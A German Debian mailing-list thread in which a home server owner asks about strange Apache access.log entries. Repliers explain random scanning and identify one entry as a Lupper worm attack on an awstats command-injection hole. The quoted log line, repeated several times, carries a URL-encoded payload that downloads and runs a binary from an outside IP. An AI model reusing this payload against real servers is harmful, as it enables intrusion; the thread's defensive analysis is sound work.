Apache access.log
Moin alle zusammen, ich bitte mal wieder um Rat. Nachdem mein Webserver nun läuft, dank eurer Hilfe wg. ddclient, habe ich in der access.log jede Menge Einträge die ich nicht verstehe. Erst mal weiß ich gar nicht wieso ich so viele (Hunderte täglich) Zugriffe habe, denn die DynDNS-Domain ist nur 4 Personen bekannt. Laut Whois habe ich aber Zugriffe aus Deutschland, China, Japan, Italien, Spanien, Frankreich und weiteren Ländern. Sind dort Hacker beim ausprobieren oder was passiert da? Wenn ich die Einträge richtig deute, wird häufig versucht auf Dateien und Verzeichnisse zuzugreifen, die jedoch gar nicht existieren. Beispiele: 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1 404 288 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 82.83.223.39 - - [15/Nov/2005:09:23:05 +0100] OPTIONS / HTTP/1.1 200 1304 - Microsoft-WebDAV-MiniRedir/5.1.2600 82.251.49.61 - - [15/Nov/2005:12:19:01 +0100] GET / HTTP/1.0 200 1292 - - 82.253.228.245 - - [15/Nov/2005:12:31:17 +0100] OPTIONS / HTTP/1.1 200 1304 - Microsoft-WebDAV-MiniRedir/5.1.2600 Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel evtl. jemand Rechte zu verändern? Kann mir vielleicht jemand erklären was da passiert? Vielen Dank und noch ein schönes Restwochenende. Gruß - Harald -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Apache access.log
* Harald Tobias [EMAIL PROTECTED] wrote: ich bitte mal wieder um Rat. Nachdem mein Webserver nun läuft, dank eurer Hilfe wg. ddclient, habe ich in der access.log jede Menge Einträge die ich nicht verstehe. Erst mal weiß ich gar nicht wieso ich so viele (Hunderte täglich) Zugriffe habe, denn die DynDNS-Domain ist nur 4 Personen bekannt. Das sind völlig wahllose Zugriff auf offene HTTP-Ports in Dial-Up-Addressbereichen. Hat also nichts mit Deiner DynDNS-Domain zu tun. Laut Whois habe ich aber Zugriffe aus Deutschland, China, Japan, Italien, Spanien, Frankreich und weiteren Ländern. Sind dort Hacker beim ausprobieren oder was passiert da? Richtig. Wenn ich die Einträge richtig deute, wird häufig versucht auf Dateien und Verzeichnisse zuzugreifen, die jedoch gar nicht existieren. Beispiele: 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1 404 288 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) Es wird versucht, über awstats - welches in letzter Zeit einige Exploits hatte - böse Sachen zu treiben. Ich kenn den Exploit nicht im Detail, aber es werden Kommandos eingeschleust, die einen Trojaner nachziehen und starten. Da Du kein awstats installiert hast, kannst Du das beruhigt ignorieren. 82.83.223.39 - - [15/Nov/2005:09:23:05 +0100] OPTIONS / HTTP/1.1 200 1304 - Microsoft-WebDAV-MiniRedir/5.1.2600 82.251.49.61 - - [15/Nov/2005:12:19:01 +0100] GET / HTTP/1.0 200 1292 - - 82.253.228.245 - - [15/Nov/2005:12:31:17 +0100] OPTIONS / HTTP/1.1 200 1304 - Microsoft-WebDAV-MiniRedir/5.1.2600 Keine Ahnung, da greift eine Anwendung zu, die sich als Microsoft-WebDAV-MiniRedir/5.1.2600 ausgibt und die verfügbaren Optionen (Operationen) Deines Webserver abquizt. Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel evtl. jemand Rechte zu verändern? Ja, aber keine Rechte von existierenden Dateien sondern die vom nachzuziehenden Trojaner (der bei Dir erst garnicht den Weg auf die Festplatte findet, da Du ja kein awstat installiert hast, über das sich ungewollterweise die Befehle einschleusen lassen können). - sebastian
Re: Apache access.log
Hallo Harald, Harald Tobias, 19.11.2005 (d.m.y): ich bitte mal wieder um Rat. Nachdem mein Webserver nun läuft, dank eurer Hilfe wg. ddclient, habe ich in der access.log jede Menge Einträge die ich nicht verstehe. Erst mal weiß ich gar nicht wieso ich so viele (Hunderte täglich) Zugriffe habe, denn die DynDNS-Domain ist nur 4 Personen bekannt. Das hindert aber doch niemanden daran, Zugriffe direkt auf die momentane IP-Adresse zu versuchen. Gruss, Christian Schmidt -- Wie man sein Kind nicht nennen sollte: Mai Käfer signature.asc Description: Digital signature
Re: Apache access.log
Harald Tobias [EMAIL PROTECTED] dixit: ich bitte mal wieder um Rat. Nachdem mein Webserver nun läuft, dank eurer Hilfe wg. ddclient, habe ich in der access.log jede Menge Einträge die ich nicht verstehe. Erst mal weiß ich gar nicht wieso ich so viele (Hunderte täglich) Zugriffe habe, denn die DynDNS-Domain ist nur 4 Personen bekannt. Nein, sie ist der ganzen Welt bekannt. In Form der IP. Da wird nicht der Hostname gesucht, da werden ganze IP-Kreise abgeklappert. Somit trifft es Dich auch -- frueher oder spaeter. Laut Whois habe ich aber Zugriffe aus Deutschland, China, Japan, Italien, Spanien, Frankreich und weiteren Ländern. Sind dort Hacker beim ausprobieren oder was passiert da? Klar. Die suchen nicht nur Deinen 80er Port, sondern vor allem auch einen 3128, einen 139 etc. etc. Wenn ich die Einträge richtig deute, wird häufig versucht auf Dateien und Verzeichnisse zuzugreifen, die jedoch gar nicht existieren. Sie existieren bei anderen und es sind Versuche, die jeweiligen Systeme aufs Kreuz zu legen. Beispiele: Die ueblichen Versuche. Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr begrenzten Personenkreis zugänglich sind. Welche? Und welches Sicherungskonzept hast Du fuer diese Anwendungen vorgesehen? Und nein: Ein heimlicher oder komplizierter Hostname ist kein Schutz. Grusz, Peter Blancke -- Hoc est enim verbum meum! -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Apache access.log
Am Samstag, den 19.11.2005, 17:22 +0100 schrieb Harald Tobias: [..] 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1 404 288 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) Wurm. Es gab eine Schwachstelle in awstats, in der eben die configdir-Variable nicht richtig gefiltert wurde. Hier wir versucht, eine Befehlszeile auszuführen. Der Befehl ist dabei URL-kodiert. Die Schwachstelle wurde IIRC schon vor einer ganzen Weile gefixt. Die aktuellen Debian-Pakete sollten für diese Schwachstelle nicht mehr anfällig sein. Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel evtl. jemand Rechte zu verändern? Kann mir vielleicht jemand erklären was da passiert? Übersetz den Befehl halt wieder zurück. MfG Daniel
Re: Apache access.log
Am Samstag, den 19.11.2005, 19:19 +0100 schrieb Daniel Leidert: Am Samstag, den 19.11.2005, 17:22 +0100 schrieb Harald Tobias: [..] 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1 404 288 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) Wurm. [..] Die Schwachstelle wurde IIRC schon vor einer ganzen Weile gefixt. Hier noch etwas mehr Info. Dieser spezielle Wurm ist wohl doch noch sehr jung. http://vil.nai.com/vil/content/v_136821.htm MfG Daniel -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Apache access.log
Hallo alle zusammen, der Einfachheit halber hier zusammengefaßt als Antwort auf eure Stellungnahmen. Mit der Domain war schon klar, als IP ist die natürlich bekannt bzw. einfach vorhanden. Gott sei Dank habe ich eine dynamische IP-Zuweisung, so daß sich wahrscheinlich keiner dauerhaft auf mein System einschießen kann. Nach den Erklärungen ist mir klar geworden, daß die Angriffe zufällig stattfinden. Peter Blancke: Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr begrenzten Personenkreis zugänglich sind. Welche? Und welches Sicherungskonzept hast Du fuer diese Anwendungen vorgesehen? Nun ja, es handelt sich um eine genealogische Datenbank und um eine Bildergalerie (Familienfotos). Na ja, ich muß zugeben, daß ich dort kein besonderes Sicherheitskonzept entwickelt habe. Ich sehe halt zu, daß der Zugang nur wenige meiner Verwandten per Paßwort erlaubt ist. Keiner von denen weiß vom Computer mehr als jeder andere Durchschnitts-Computer-Benutzer. Eher weniger. Die vorgegebenen Paßwörter der Anwendungen wurden von mir durch andere Paßwörter ersetzt. Die Sicherheitshinweise aus den Readme's und die damit verbundenen Maßnahmen habe ich befolgt. Auch das DBMS hat keine Default-Paßwörter mehr, sondern von mir wurden eigene Paßwörter vergeben. Updates fahre ich wöchentlich auf allen meinen Linux-Rechnern. Updates für Windows führe ich nicht durch. Isch 'abe gar kein Windows! Daniel Leidert Linux/Lupper.worm: Der ist es offensichtlich, der meinen Server infiltrieren will. Als ich mir eben die Liste der zu infizierenden Verzeichnisse und Dateien ansah, sah es wie eine Kopie meiner access.log aus. Keines der Verzeichnisse und Dateien existiert auf meinem Server, und das ist auch gut so. Nun gut, vielen Dank für die Auskünfte, Ihr habt mir geholfen besser zu verstehen. Ich wünsche euch allen ein schönes Restwochenende. Tschüß - Harald -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)